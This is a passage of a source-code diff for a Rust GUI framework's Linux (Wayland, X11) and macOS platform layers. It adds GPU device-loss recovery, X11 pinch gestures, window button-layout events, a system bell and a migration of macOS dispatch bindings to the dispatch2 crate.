@@ -138,7 +145,7 @@ impl WaylandSurfaceState { let layer_surface = layer_shell.get_layer_surface( &surface, - None, + target_output.as_ref(), super::layer_shell::wayland_layer(options.layer), options.namespace.clone(), &globals.qh, @@ -317,7 +324,8 @@ impl WaylandWindowState { viewport: Option, client: WaylandClientStatePtr, globals: Globals, - gpu_context: &mut Option, + gpu_context: gpui_wgpu::GpuContext, + compositor_gpu: Option, options: WindowParams, parent: Option, ) -> anyhow::Result { @@ -337,14 +345,21 @@ impl WaylandWindowState { height: DevicePixels(f32::from(options.bounds.size.height) as i32), }, transparent: true, + preferred_present_mode: None, }; - WgpuRenderer::new(gpu_context, &raw_window, config)? + WgpuRenderer::new(gpu_context, &raw_window, config, compositor_gpu)? }; if let WaylandSurfaceState::Xdg(ref xdg_state) = surface_state { if let Some(title) = options.titlebar.and_then(|titlebar| titlebar.title) { xdg_state.toplevel.set_title(title.to_string()); } + // Set max window size based on the GPU's maximum texture dimension. + // This prevents the window from being resized larger than what the GPU can render. + let max_texture_size = renderer.max_texture_size() as i32; + xdg_state + .toplevel + .set_max_size(max_texture_size, max_texture_size); } Ok(Self { @@ -376,6 +391,7 @@ impl WaylandWindowState { handle, active: false, hovered: false, + force_render_after_recovery: false, in_progress_window_controls: None, window_controls: WindowControls::default(), client_inset: None, @@ -481,14 +497,17 @@ impl WaylandWindow { pub fn new( handle: AnyWindowHandle, globals: Globals, - gpu_context: &mut Option, + gpu_context: gpui_wgpu::GpuContext, + compositor_gpu: Option, client: WaylandClientStatePtr, params: WindowParams, appearance: WindowAppearance, parent: Option, + target_output: Option, ) -> anyhow::Result<(Self, ObjectId)> { let surface = globals.compositor.create_surface(&globals.qh, ()); - let surface_state = WaylandSurfaceState::new(&surface, &globals, ¶ms, parent.clone())?; + let surface_state = + WaylandSurfaceState::new(&surface, &globals, ¶ms, parent.clone(), target_output)?; if let Some(fractional_scale_manager) = globals.fractional_scale_manager.as_ref() { fractional_scale_manager.get_fractional_scale(&surface, &globals.qh, surface.id()); @@ -509,6 +528,7 @@ impl WaylandWindow { client, globals, gpu_context, + compositor_gpu, params, parent, )?)), @@ -553,11 +573,16 @@ impl WaylandWindowStatePtr { let mut state = self.state.borrow_mut(); state.surface.frame(&state.globals.qh, state.surface.id()); state.resize_throttle = false; + let force_render = state.force_render_after_recovery; + state.force_render_after_recovery = false; drop(state); let mut cb = self.callbacks.borrow_mut(); if let Some(fun) = cb.request_frame.as_mut() { - fun(Default::default()); + fun(RequestFrameOptions { + force_render, + ..Default::default() + }); } } @@ -585,6 +610,7 @@ impl WaylandWindowStatePtr { state.tiling = configure.tiling; // Limit interactive resizes to once per vblank if configure.resizing && state.resize_throttle { + state.surface_state.ack_configure(serial); return; } else if configure.resizing { state.resize_throttle = true; @@ -1021,6 +1047,14 @@ impl WaylandWindowStatePtr { } } + pub fn set_button_layout(&self) { + let callback = self.callbacks.borrow_mut().button_layout_changed.take(); + if let Some(mut fun) = callback { + fun(); + self.callbacks.borrow_mut().button_layout_changed = Some(fun); + } + } + pub fn primary_output_scale(&self) -> i32 { self.state.borrow_mut().primary_output_scale() } @@ -1242,6 +1276,7 @@ impl PlatformWindow for WaylandWindow { let state = client.borrow(); state .gpu_context + .borrow() .as_ref() .is_some_and(|ctx| ctx.supports_dual_source_blending()) } @@ -1317,8 +1352,38 @@ impl PlatformWindow for WaylandWindow { self.0.callbacks.borrow_mut().appearance_changed = Some(callback); } + fn on_button_layout_changed(&self, callback: Box) { + self.0.callbacks.borrow_mut().button_layout_changed = Some(callback); + } + fn draw(&self, scene: &Scene) { let mut state = self.borrow_mut(); + + if state.renderer.device_lost() { + let raw_window = RawWindow { + window: state.surface.id().as_ptr().cast::(), + display: state + .surface + .backend() + .upgrade() + .unwrap() + .display_ptr() + .cast::(), + }; + state.renderer.recover(&raw_window).unwrap_or_else(|err| { + panic!( + "GPU device lost and recovery failed. \ + This may happen after system suspend/resume. \ + Please restart the application.\n\nError: {err}" + ) + }); + + // The current scene references atlas textures that were cleared during recovery. + // Skip this frame and let the next frame rebuild the scene with fresh textures. + state.force_render_after_recovery = true; + return; + } + state.renderer.draw(scene); } @@ -1414,6 +1479,18 @@ impl PlatformWindow for WaylandWindow { fn gpu_specs(&self) -> Option { self.borrow().renderer.gpu_specs().into() } + + fn play_system_bell(&self) { + let state = self.borrow(); + let surface = if state.surface_state.toplevel().is_some() { + Some(&state.surface) + } else { + None + }; + if let Some(bell) = state.globals.system_bell.as_ref() { + bell.ring(surface); + } + } } fn update_window(mut state: RefMut) { diff --git a/crates/gpui_linux/src/linux/x11/client.rs b/crates/gpui_linux/src/linux/x11/client.rs index 7e3f67c9bf5fe3176f3badd9b33375ffdeb9dc19..57871e6ef32b937a7a47662f8022293a57bc3fe2 100644 --- a/crates/gpui_linux/src/linux/x11/client.rs +++ b/crates/gpui_linux/src/linux/x11/client.rs @@ -31,7 +31,7 @@ use x11rb::{ AtomEnum, ChangeWindowAttributesAux, ClientMessageData, ClientMessageEvent, ConnectionExt as _, EventMask, ModMask, Visibility, }, - protocol::{Event, randr, render, xinput, xkb, xproto}, + protocol::{Event, dri3, randr, render, xinput, xkb, xproto}, resource_manager::Database, wrapper::ConnectionExt as _, xcb_ffi::XCBConnection, @@ -62,9 +62,9 @@ use gpui::{ AnyWindowHandle, Bounds, ClipboardItem, CursorStyle, DisplayId, FileDropEvent, Keystroke, Modifiers, ModifiersChangedEvent, MouseButton, Pixels, PlatformDisplay, PlatformInput, PlatformKeyboardLayout, PlatformWindow, Point, RequestFrameOptions, ScrollDelta, Size, - TouchPhase, WindowParams, point, px, + TouchPhase, WindowButtonLayout, WindowParams, point, px, }; -use gpui_wgpu::WgpuContext; +use gpui_wgpu::{CompositorGpuHint, GpuContext}; /// Value for DeviceId parameters which selects all devices. pub(crate) const XINPUT_ALL_DEVICES: xinput::DeviceId = 0; @@ -176,8 +176,10 @@ pub struct X11ClientState { pub(crate) last_mouse_button: Option, pub(crate) last_location: Point, pub(crate) current_count: usize, + pub(crate) pinch_scale: f32, - pub(crate) gpu_context: Option, + pub(crate) gpu_context: GpuContext, + pub(crate) compositor_gpu: Option, pub(crate) scale_factor: f32, @@ -294,7 +296,7 @@ impl X11ClientStatePtr { } #[derive(Clone)] -pub(crate) struct X11Client(Rc>); +pub(crate) struct X11Client(pub(crate) Rc>); impl X11Client { pub(crate) fn new() -> anyhow::Result { @@ -341,11 +343,12 @@ impl X11Client { xcb_connection.prefetch_extension_information(render::X11_EXTENSION_NAME)?; xcb_connection.prefetch_extension_information(xinput::X11_EXTENSION_NAME)?; - // Announce to X server that XInput up to 2.1 is supported. To increase this to 2.2 and - // beyond, support for touch events would need to be added. + // Announce to X server that XInput up to 2.4 is supported. + // Version 2.4 is needed for gesture events (GesturePinchBegin/Update/End). + // If the server only supports an older version, gesture events simply won't be delivered. let xinput_version = get_reply( || "XInput XiQueryVersion failed", - xcb_connection.xinput_xi_query_version(2, 1), + xcb_connection.xinput_xi_query_version(2, 4), )?; assert!( xinput_version.major_version >= 2, @@ -430,6 +433,9 @@ impl X11Client { let clipboard = Clipboard::new().context("Failed to initialize clipboard")?; + let screen = &xcb_connection.setup().roots[x_root_index]; + let compositor_gpu = detect_compositor_gpu(&xcb_connection, screen); + let xcb_connection = Rc::new(xcb_connection); let ximc = X11rbClient::init(Rc::clone(&xcb_connection), x_root_index, None).ok(); @@ -468,6 +474,15 @@ impl X11Client { window.window.set_appearance(appearance); } } + XDPEvent::ButtonLayout(layout_str) => { + let layout = WindowButtonLayout::parse(&layout_str) + .log_err() + .unwrap_or_else(WindowButtonLayout::linux_default); + client.with_common(|common| common.button_layout = layout); + for window in client.0.borrow_mut().windows.values_mut() { + window.window.set_button_layout(); + } + } XDPEvent::CursorTheme(_) | XDPEvent::CursorSize(_) => { // noop, X11 manages this for us. } @@ -489,7 +504,9 @@ impl X11Client { last_mouse_button: None, last_location: Point::new(px(0.0), px(0.0)), current_count: 0, - gpu_context: None, + pinch_scale: 1.0, + gpu_context: Rc::new(RefCell::new(None)), + compositor_gpu, scale_factor, xkb_context, @@ -597,6 +614,9 @@ impl X11Client { Ok(None) => { break; } + Err(err @ ConnectionError::IoError(..)) => { + return Err(EventHandlerError::from(err)); + } Err(err) => { let err = handle_connection_error(err); log::warn!("error while polling for X11 events: {err:?}"); @@ -1307,6 +1327,64 @@ impl X11Client { reset_pointer_device_scroll_positions(pointer); } } + Event::XinputGesturePinchBegin(event) => { + let window = self.get_window(event.event)?; + let mut state = self.0.borrow_mut(); + state.pinch_scale = 1.0; + let modifiers = modifiers_from_xinput_info(event.mods); + state.modifiers = modifiers; + let position = point( + px(event.event_x as f32 / u16::MAX as f32 / state.scale_factor), + px(event.event_y as f32 / u16::MAX as f32 / state.scale_factor), + ); + drop(state); + window.handle_input(PlatformInput::Pinch(gpui::PinchEvent { + position, + delta: 0.0, + modifiers, + phase: gpui::TouchPhase::Started, + })); + } + Event::XinputGesturePinchUpdate(event) => { + let window = self.get_window(event.event)?; + let mut state = self.0.borrow_mut(); + let modifiers = modifiers_from_xinput_info(event.mods); + state.modifiers = modifiers; + let position = point( + px(event.event_x as f32 / u16::MAX as f32 / state.scale_factor), + px(event.event_y as f32 / u16::MAX as f32 / state.scale_factor), + ); + // scale is in FP16.16 format: divide by 65536 to get the float value + let new_absolute_scale = event.scale as f32 / 65536.0; + let previous_scale = state.pinch_scale; + let zoom_delta = new_absolute_scale - previous_scale; + state.pinch_scale = new_absolute_scale; + drop(state); + window.handle_input(PlatformInput::Pinch(gpui::PinchEvent { + position, + delta: zoom_delta, + modifiers, + phase: gpui::TouchPhase::Moved, + })); + } + Event::XinputGesturePinchEnd(event) => { + let window = self.get_window(event.event)?; + let mut state = self.0.borrow_mut(); + state.pinch_scale = 1.0; + let modifiers = modifiers_from_xinput_info(event.mods); + state.modifiers = modifiers; + let position = point( + px(event.event_x as f32 / u16::MAX as f32 / state.scale_factor), + px(event.event_y as f32 / u16::MAX as f32 / state.scale_factor), + ); + drop(state); + window.handle_input(PlatformInput::Pinch(gpui::PinchEvent { + position, + delta: 0.0, + modifiers, + phase: gpui::TouchPhase::Ended, + })); + } _ => {} }; @@ -1514,11 +1592,13 @@ impl LinuxClient for X11Client { let atoms = state.atoms; let scale_factor = state.scale_factor; let appearance = state.common.appearance; + let compositor_gpu = state.compositor_gpu.take(); let window = X11Window::new( handle, X11ClientStatePtr(Rc::downgrade(&self.0)), state.common.foreground_executor.clone(), - &mut state.gpu_context, + state.gpu_context.clone(), + compositor_gpu, params, &xcb_connection, client_side_decorations_supported, @@ -1864,11 +1944,14 @@ impl X11ClientState { if let Some(window) = state.windows.get_mut(&x_window) { let expose_event_received = window.expose_event_received; window.expose_event_received = false; + let force_render = std::mem::take( + &mut window.window.state.borrow_mut().force_render_after_recovery, + ); let window = window.window.clone(); drop(state); window.refresh(RequestFrameOptions { require_presentation: expose_event_received, - force_render: false, + force_render, }); } xcb_connection @@ -1976,7 +2059,30 @@ fn fp3232_to_f32(value: xinput::Fp3232) -> f32 { value.integral as f32 + value.frac as f32 / u32::MAX as f32 } -fn check_compositor_present(xcb_connection: &XCBConnection, root: u32) -> bool { +fn detect_compositor_gpu( + xcb_connection: &XCBConnection, + screen: &xproto::Screen, +) -> Option { + use std::os::fd::AsRawFd; + use std::os::unix::fs::MetadataExt; + + xcb_connection + .extension_information(dri3::X11_EXTENSION_NAME) + .ok()??; + + let reply = dri3::open(xcb_connection, screen.root, 0) + .ok()? + .reply() + .ok()?; + let fd = reply.device_fd; + + let path = format!("/proc/self/fd/{}", fd.as_raw_fd()); + let metadata = std::fs::metadata(&path).ok()?; + + crate::linux::compositor_gpu_hint_from_dev_t(metadata.rdev()) +} + +fn check_compositor_present(xcb_connection: &XCBConnection, root: xproto::Window) -> bool { // Method 1: Check for _NET_WM_CM_S{root} let atom_name = format!("_NET_WM_CM_S{}", root); let atom1 = get_reply( diff --git a/crates/gpui_linux/src/linux/x11/window.rs b/crates/gpui_linux/src/linux/x11/window.rs index 0ddd6e7adff84908e6a1c06d661347d39bdc5c9e..1974cc0bb28f62da4d7dcb3e9fca92b6324470bb 100644 --- a/crates/gpui_linux/src/linux/x11/window.rs +++ b/crates/gpui_linux/src/linux/x11/window.rs @@ -9,7 +9,7 @@ use gpui::{ Tiling, WindowAppearance, WindowBackgroundAppearance, WindowBounds, WindowControlArea, WindowDecorations, WindowKind, WindowParams, px, }; -use gpui_wgpu::{WgpuContext, WgpuRenderer, WgpuSurfaceConfig}; +use gpui_wgpu::{CompositorGpuHint, WgpuRenderer, WgpuSurfaceConfig}; use collections::FxHashSet; use raw_window_handle as rwh; @@ -225,6 +225,7 @@ fn find_visuals(xcb: &XCBConnection, screen_index: usize) -> VisualSet { set } +#[derive(Debug, Clone, Copy)] struct RawWindow { connection: *mut c_void, screen_id: usize, @@ -249,6 +250,7 @@ pub struct Callbacks { should_close: Option bool>>, close: Option>, appearance_changed: Option>, + button_layout_changed: Option>, } pub struct X11WindowState { @@ -259,6 +261,8 @@ pub struct X11WindowState { executor: ForegroundExecutor, atoms: XcbAtoms, x_root_window: xproto::Window, + x_screen_index: usize, + visual_id: u32, pub(crate) counter_id: sync::Counter, pub(crate) last_sync_counter: Option, bounds: Bounds, @@ -273,6 +277,7 @@ pub struct X11WindowState { hidden: bool, active: bool, hovered: bool, + pub(crate) force_render_after_recovery: bool, fullscreen: bool, client_side_decorations_supported: bool, decorations: WindowDecorations, @@ -319,12 +324,28 @@ impl rwh::HasDisplayHandle for RawWindow { impl rwh::HasWindowHandle for X11Window { fn window_handle(&self) -> Result, rwh::HandleError> { - unimplemented!() + let Some(non_zero) = NonZeroU32::new(self.0.x_window) else { + return Err(rwh::HandleError::Unavailable); + }; + let handle = rwh::XcbWindowHandle::new(non_zero); + Ok(unsafe { rwh::WindowHandle::borrow_raw(handle.into()) }) } } + impl rwh::HasDisplayHandle for X11Window { fn display_handle(&self) -> Result, rwh::HandleError> { - unimplemented!() + let connection = + as_raw_xcb_connection::AsRawXcbConnection::as_raw_xcb_connection(&*self.0.xcb) + as *mut _; + let Some(non_zero) = NonNull::new(connection) else { + return Err(rwh::HandleError::Unavailable); + }; + let screen_id = { + let state = self.0.state.borrow(); + u32::from(state.display.id()) as i32 + }; + let handle = rwh::XcbDisplayHandle::new(Some(non_zero), screen_id); + Ok(unsafe { rwh::DisplayHandle::borrow_raw(handle.into()) }) } } @@ -391,7 +412,8 @@ impl X11WindowState { handle: AnyWindowHandle, client: X11ClientStatePtr, executor: ForegroundExecutor, - gpu_context: &mut Option, + gpu_context: gpui_wgpu::GpuContext, + compositor_gpu: Option, params: WindowParams, xcb: &Rc, client_side_decorations_supported: bool, @@ -497,21 +519,6 @@ impl X11WindowState { ), )?; - if let Some(size) = params.window_min_size { - let mut size_hints = WmSizeHints::new(); - let min_size = (f32::from(size.width) as i32, f32::from(size.height) as i32); - size_hints.min_size = Some(min_size); - check_reply( - || { - format!( - "X11 change of WM_SIZE_HINTS failed. min_size: {:?}", - min_size - ) - }, - size_hints.set_normal_hints(xcb, x_window), - )?; - } - let reply = get_reply(|| "X11 GetGeometry failed.", xcb.get_geometry(x_window))?; if reply.x == 0 && reply.y == 0 { bounds.origin.x.0 += 2; @@ -529,7 +536,7 @@ impl X11WindowState { && let Some(title) = titlebar.title { check_reply( - || "X11 ChangeProperty8 on window title failed.", + || "X11 ChangeProperty8 on WM_NAME failed.", xcb.change_property8( xproto::PropMode::REPLACE, x_window, @@ -538,6 +545,16 @@ impl X11WindowState { title.as_bytes(), ), )?; + check_reply( + || "X11 ChangeProperty8 on _NET_WM_NAME failed.", + xcb.change_property8( + xproto::PropMode::REPLACE, + x_window, + atoms._NET_WM_NAME, + atoms.UTF8_STRING, + title.as_bytes(), + ), + )?; } if params.kind == WindowKind::PopUp { @@ -654,7 +671,13 @@ impl X11WindowState { | xinput::XIEventMask::BUTTON_PRESS | xinput::XIEventMask::BUTTON_RELEASE | xinput::XIEventMask::ENTER - | xinput::XIEventMask::LEAVE, + | xinput::XIEventMask::LEAVE + // x11rb 0.13 doesn't define XIEventMask constants for gesture + // events, so we construct them from the event opcodes (each + // XInput event type N maps to mask bit N). + | xinput::XIEventMask::from(1u32 << xinput::GESTURE_PINCH_BEGIN_EVENT) + | xinput::XIEventMask::from(1u32 << xinput::GESTURE_PINCH_UPDATE_EVENT) + | xinput::XIEventMask::from(1u32 << xinput::GESTURE_PINCH_END_EVENT), ], }], ), @@ -693,10 +716,30 @@ impl X11WindowState { // If the window appearance changes, then the renderer will get updated // too transparent: false, + preferred_present_mode: None, }; - WgpuRenderer::new(gpu_context, &raw_window, config)? + WgpuRenderer::new(gpu_context, &raw_window, config, compositor_gpu)? }; + // Set max window size hints based on the GPU's maximum texture dimension. + // This prevents the window from being resized larger than what the GPU can render. + let max_texture_size = renderer.max_texture_size(); + let mut size_hints = WmSizeHints::new(); + if let Some(size) = params.window_min_size { + size_hints.min_size = + Some((f32::from(size.width) as i32, f32::from(size.height) as i32)); + } + size_hints.max_size = Some((max_texture_size as i32, max_texture_size as i32)); + check_reply( + || { + format!( + "X11 change of WM_SIZE_HINTS failed. max_size: {:?}", + max_texture_size + ) + }, + size_hints.set_normal_hints(xcb, x_window), + )?; + let display = Rc::new(X11Display::new(xcb, scale_factor, x_screen_index)?); Ok(Self { @@ -706,6 +749,8 @@ impl X11WindowState { executor, display, x_root_window: visual_set.root, + x_screen_index, + visual_id: visual.id, bounds: bounds.to_pixels(scale_factor), scale_factor, renderer, @@ -713,6 +758,7 @@ impl X11WindowState { input_handler: None, active: false, hovered: false, + force_render_after_recovery: false, fullscreen: false, maximized_vertical: false, maximized_horizontal: false, @@ -798,7 +844,8 @@ impl X11Window { handle: AnyWindowHandle, client: X11ClientStatePtr, executor: ForegroundExecutor, - gpu_context: &mut Option, + gpu_context: gpui_wgpu::GpuContext, + compositor_gpu: Option, params: WindowParams, xcb: &Rc, client_side_decorations_supported: bool, @@ -815,6 +862,7 @@ impl X11Window { client, executor, gpu_context, + compositor_gpu, params, xcb, client_side_decorations_supported, @@ -1150,13 +1198,11 @@ impl X11WindowStatePtr { } pub fn set_bounds(&self, bounds: Bounds) -> anyhow::Result<()> { - let mut resize_args = None; - let is_resize; - { + let (is_resize, content_size, scale_factor) = { let mut state = self.state.borrow_mut(); let bounds = bounds.map(|f| px(f as f32 / state.scale_factor)); - is_resize = bounds.size.width != state.bounds.size.width + let is_resize = bounds.size.width != state.bounds.size.width || bounds.size.height != state.bounds.size.height; // If it's a resize event (only width/height changed), we ignore `bounds.origin` @@ -1168,22 +1214,19 @@ impl X11WindowStatePtr { } let gpu_size = query_render_extent(&self.xcb, self.x_window)?; - if true { - state.renderer.update_drawable_size(gpu_size); - resize_args = Some((state.content_size(), state.scale_factor)); - } + state.renderer.update_drawable_size(gpu_size); + let result = (is_resize, state.content_size(), state.scale_factor); if let Some(value) = state.last_sync_counter.take() { check_reply( || "X11 sync SetCounter failed.", sync::set_counter(&self.xcb, state.counter_id, value), )?; } - } + result + }; let mut callbacks = self.callbacks.borrow_mut(); - if let Some((content_size, scale_factor)) = resize_args - && let Some(ref mut fun) = callbacks.resize - { + if let Some(ref mut fun) = callbacks.resize { fun(content_size, scale_factor) } @@ -1223,6 +1266,14 @@ impl X11WindowStatePtr { self.callbacks.borrow_mut().appearance_changed = Some(fun); } } + + pub fn set_button_layout(&self) { + let callback = self.callbacks.borrow_mut().button_layout_changed.take(); + if let Some(mut fun) = callback { + fun(); + self.callbacks.borrow_mut().button_layout_changed = Some(fun); + } + } } impl PlatformWindow for X11Window { @@ -1476,6 +1527,7 @@ impl PlatformWindow for X11Window { let state = ref_cell.borrow(); state .gpu_context + .borrow() .as_ref() .is_some_and(|ctx| ctx.supports_dual_source_blending()) }) @@ -1568,8 +1620,36 @@ impl PlatformWindow for X11Window { self.0.callbacks.borrow_mut().appearance_changed = Some(callback); } + fn on_button_layout_changed(&self, callback: Box) { + self.0.callbacks.borrow_mut().button_layout_changed = Some(callback); + } + fn draw(&self, scene: &Scene) { let mut inner = self.0.state.borrow_mut(); + + if inner.renderer.device_lost() { + let raw_window = RawWindow { + connection: as_raw_xcb_connection::AsRawXcbConnection::as_raw_xcb_connection( + &*self.0.xcb, + ) as *mut _, + screen_id: inner.x_screen_index, + window_id: self.0.x_window, + visual_id: inner.visual_id, + }; + inner.renderer.recover(&raw_window).unwrap_or_else(|err| { + panic!( + "GPU device lost and recovery failed. \ + This may happen after system suspend/resume. \ + Please restart the application.\n\nError: {err}" + ) + }); + + // The current scene references atlas textures that were cleared during recovery. + // Skip this frame and let the next frame rebuild the scene with fresh textures. + inner.force_render_after_recovery = true; + return; + } + inner.renderer.draw(scene); } @@ -1766,4 +1846,9 @@ impl PlatformWindow for X11Window { fn gpu_specs(&self) -> Option { self.0.state.borrow().renderer.gpu_specs().into() } + + fn play_system_bell(&self) { + // Volume 0% means don't increase or decrease from system volume + let _ = self.0.xcb.bell(0); + } } diff --git a/crates/gpui_linux/src/linux/xdg_desktop_portal.rs b/crates/gpui_linux/src/linux/xdg_desktop_portal.rs index 911ac319db2b2a803a5e5e715f7a04f8cb128d7a..9b5d72476b61e81ce1d90d79de9286539060c0ba 100644 --- a/crates/gpui_linux/src/linux/xdg_desktop_portal.rs +++ b/crates/gpui_linux/src/linux/xdg_desktop_portal.rs @@ -15,6 +15,7 @@ pub enum Event { CursorTheme(String), #[cfg_attr(feature = "x11", allow(dead_code))] CursorSize(u32), + ButtonLayout(String), } pub struct XDPEventSource { @@ -51,6 +52,13 @@ impl XDPEventSource { sender.send(Event::CursorSize(initial_size as u32))?; } + if let Ok(initial_layout) = settings + .read::("org.gnome.desktop.wm.preferences", "button-layout") + .await + { + sender.send(Event::ButtonLayout(initial_layout))?; + } + if let Ok(mut cursor_theme_changed) = settings .receive_setting_changed_with_args( "org.gnome.desktop.interface", @@ -89,6 +97,25 @@ impl XDPEventSource { .detach(); } + if let Ok(mut button_layout_changed) = settings + .receive_setting_changed_with_args( + "org.gnome.desktop.wm.preferences", + "button-layout", + ) + .await + { + let sender = sender.clone(); + background + .spawn(async move { + while let Some(layout) = button_layout_changed.next().await { + let layout = layout?; + sender.send(Event::ButtonLayout(layout))?; + } + anyhow::Ok(()) + }) + .detach(); + } + let mut appearance_changed = settings.receive_color_scheme_changed().await?; while let Some(scheme) = appearance_changed.next().await { sender.send(Event::WindowAppearance( diff --git a/crates/gpui_macos/Cargo.toml b/crates/gpui_macos/Cargo.toml index 4aedb1f4f1bed02e22f0dc6a881d60cc39ddd3a1..3626bbd05e8a7c7fa2ae577f11e5277da995d2f7 100644 --- a/crates/gpui_macos/Cargo.toml +++ b/crates/gpui_macos/Cargo.toml @@ -34,6 +34,7 @@ core-text = "21" core-video.workspace = true ctor.workspace = true derive_more.workspace = true +dispatch2 = "0.3.1" etagere = "0.2" # WARNING: If you change this, you must also publish a new version of zed-font-kit to crates.io font-kit = { git = "https://github.com/zed-industries/font-kit", rev = "110523127440aefb11ce0cf280ae7c5071337ec5", package = "zed-font-kit", version = "0.14.1-zed", optional = true } @@ -47,6 +48,7 @@ mach2.workspace = true media.workspace = true metal.workspace = true objc.workspace = true +objc2-app-kit.workspace = true parking_lot.workspace = true pathfinder_geometry = "0.5" raw-window-handle = "0.6" @@ -57,6 +59,5 @@ util.workspace = true uuid.workspace = true [target.'cfg(target_os = "macos")'.build-dependencies] -bindgen = "0.71" cbindgen = { version = "0.28.0", default-features = false } -gpui.workspace = true \ No newline at end of file +gpui.workspace = true diff --git a/crates/gpui_macos/build.rs b/crates/gpui_macos/build.rs index 32dfc571d257495c9c0a8cae54bc9fb567b51489..d5c1893f4ce18190a546aed1a708685cf66dc0e9 100644 --- a/crates/gpui_macos/build.rs +++ b/crates/gpui_macos/build.rs @@ -15,8 +15,6 @@ mod macos_build { use cbindgen::Config; pub fn run() { - generate_dispatch_bindings(); - let header_path = generate_shader_bindings(); #[cfg(feature = "runtime_shaders")] @@ -25,39 +23,6 @@ mod macos_build { compile_metal_shaders(&header_path); } - fn generate_dispatch_bindings() { - println!("cargo:rustc-link-lib=framework=System"); - - let bindings = bindgen::Builder::default() - .header("src/dispatch.h") - .allowlist_var("_dispatch_main_q") - .allowlist_var("_dispatch_source_type_data_add") - .allowlist_var("DISPATCH_QUEUE_PRIORITY_HIGH") - .allowlist_var("DISPATCH_QUEUE_PRIORITY_DEFAULT") - .allowlist_var("DISPATCH_QUEUE_PRIORITY_LOW") - .allowlist_var("DISPATCH_TIME_NOW") - .allowlist_function("dispatch_get_global_queue") - .allowlist_function("dispatch_async_f") - .allowlist_function("dispatch_after_f") - .allowlist_function("dispatch_time") - .allowlist_function("dispatch_source_merge_data") - .allowlist_function("dispatch_source_create") - .allowlist_function("dispatch_source_set_event_handler_f") - .allowlist_function("dispatch_resume") - .allowlist_function("dispatch_suspend") - .allowlist_function("dispatch_source_cancel") - .allowlist_function("dispatch_set_context") - .parse_callbacks(Box::new(bindgen::CargoCallbacks::new())) - .layout_tests(false) - .generate() - .expect("unable to generate bindings"); - - let out_path = PathBuf::from(env::var("OUT_DIR").unwrap()); - bindings - .write_to_file(out_path.join("dispatch_sys.rs")) - .expect("couldn't write dispatch bindings"); - } - fn generate_shader_bindings() -> PathBuf { let output_path = PathBuf::from(env::var("OUT_DIR").unwrap()).join("scene.h"); diff --git a/crates/gpui_macos/src/dispatch.h b/crates/gpui_macos/src/dispatch.h deleted file mode 100644 index 54f3818738042b00938ad566ec0269fc0d80241d..0000000000000000000000000000000000000000 --- a/crates/gpui_macos/src/dispatch.h +++ /dev/null @@ -1,2 +0,0 @@ -#include -#include diff --git a/crates/gpui_macos/src/dispatcher.rs b/crates/gpui_macos/src/dispatcher.rs index 755016e44be84f585631fbf311ef499adfc69367..f4b80ec7cbaf6deeebad1f7b6448463c9e132afe 100644 --- a/crates/gpui_macos/src/dispatcher.rs +++ b/crates/gpui_macos/src/dispatcher.rs @@ -1,10 +1,7 @@ -#![allow(non_upper_case_globals)] -#![allow(non_camel_case_types)] -#![allow(non_snake_case)] - +use dispatch2::{DispatchQueue, DispatchQueueGlobalPriority, DispatchTime, GlobalQueueIdentifier}; use gpui::{ - GLOBAL_THREAD_TIMINGS, PlatformDispatcher, Priority, RunnableMeta, RunnableVariant, - THREAD_TIMINGS, TaskTiming, ThreadTaskTimings, + GLOBAL_THREAD_TIMINGS, PlatformDispatcher, Priority, RunnableMeta, RunnableVariant, TaskTiming, + ThreadTaskTimings, add_task_timing, }; use mach2::{ kern_return::KERN_SUCCESS, @@ -26,21 +23,10 @@ use objc::{ }; use std::{ ffi::c_void, - ptr::{NonNull, addr_of}, + ptr::NonNull, time::{Duration, Instant}, }; -/// All items in the generated file are marked as pub, so we're gonna wrap it in a separate mod to prevent -/// these pub items from leaking into public API. -pub(crate) mod dispatch_sys { - include!(concat!(env!("OUT_DIR"), "/dispatch_sys.rs")); -} - -use dispatch_sys::*; -pub(crate) fn dispatch_get_main_queue() -> dispatch_queue_t { - addr_of!(_dispatch_main_q) as *const _ as dispatch_queue_t -} - pub(crate) struct MacDispatcher; impl MacDispatcher { @@ -56,25 +42,7 @@ impl PlatformDispatcher for MacDispatcher { } fn get_current_thread_timings(&self) -> ThreadTaskTimings { - THREAD_TIMINGS.with(|timings| { - let timings = timings.lock(); - let thread_name = timings.thread_name.clone(); - let total_pushed = timings.total_pushed; - let timings = &timings.timings; - - let mut vec = Vec::with_capacity(timings.len()); - - let (s1, s2) = timings.as_slices(); - vec.extend_from_slice(s1); - vec.extend_from_slice(s2); - - ThreadTaskTimings { - thread_name, - thread_id: std::thread::current().id(), - timings: vec, - total_pushed, - } - }) + gpui::profiler::get_current_thread_task_timings() } fn is_main_thread(&self) -> bool { @@ -89,43 +57,32 @@ impl PlatformDispatcher for MacDispatcher { Priority::RealtimeAudio => { panic!("RealtimeAudio priority should use spawn_realtime, not dispatch") } - Priority::High => DISPATCH_QUEUE_PRIORITY_HIGH as isize, - Priority::Medium => DISPATCH_QUEUE_PRIORITY_DEFAULT as isize, - Priority::Low => DISPATCH_QUEUE_PRIORITY_LOW as isize, + Priority::High => DispatchQueueGlobalPriority::High, + Priority::Medium => DispatchQueueGlobalPriority::Default, + Priority::Low => DispatchQueueGlobalPriority::Low, }; unsafe { - dispatch_async_f( - dispatch_get_global_queue(queue_priority, 0), - context, - Some(trampoline as unsafe extern "C" fn(*mut c_void)), - ); + DispatchQueue::global_queue(GlobalQueueIdentifier::Priority(queue_priority)) + .exec_async_f(context, trampoline); } } fn dispatch_on_main_thread(&self, runnable: RunnableVariant, _priority: Priority) { let context = runnable.into_raw().as_ptr() as *mut c_void; unsafe { - dispatch_async_f( - dispatch_get_main_queue(), - context, - Some(trampoline as unsafe extern "C" fn(*mut c_void)), - ); + DispatchQueue::main().exec_async_f(context, trampoline); } } fn dispatch_after(&self, duration: Duration, runnable: RunnableVariant) { let context = runnable.into_raw().as_ptr() as *mut c_void; + let queue = DispatchQueue::global_queue(GlobalQueueIdentifier::Priority( + DispatchQueueGlobalPriority::High, + )); + let when = DispatchTime::NOW.time(duration.as_nanos() as i64); unsafe { - let queue = - dispatch_get_global_queue(DISPATCH_QUEUE_PRIORITY_HIGH.try_into().unwrap(), 0); - let when = dispatch_time(DISPATCH_TIME_NOW as u64, duration.as_nanos() as i64); - dispatch_after_f( - when, - queue, - context, - Some(trampoline as unsafe extern "C" fn(*mut c_void)), - ); + DispatchQueue::exec_after_f(when, &queue, context, trampoline); } } @@ -226,43 +183,19 @@ extern "C" fn trampoline(context: *mut c_void) { let runnable = unsafe { Runnable::::from_raw(NonNull::new_unchecked(context as *mut ())) }; - let metadata = runnable.metadata(); - - // Check if the executor that spawned this task was closed - if 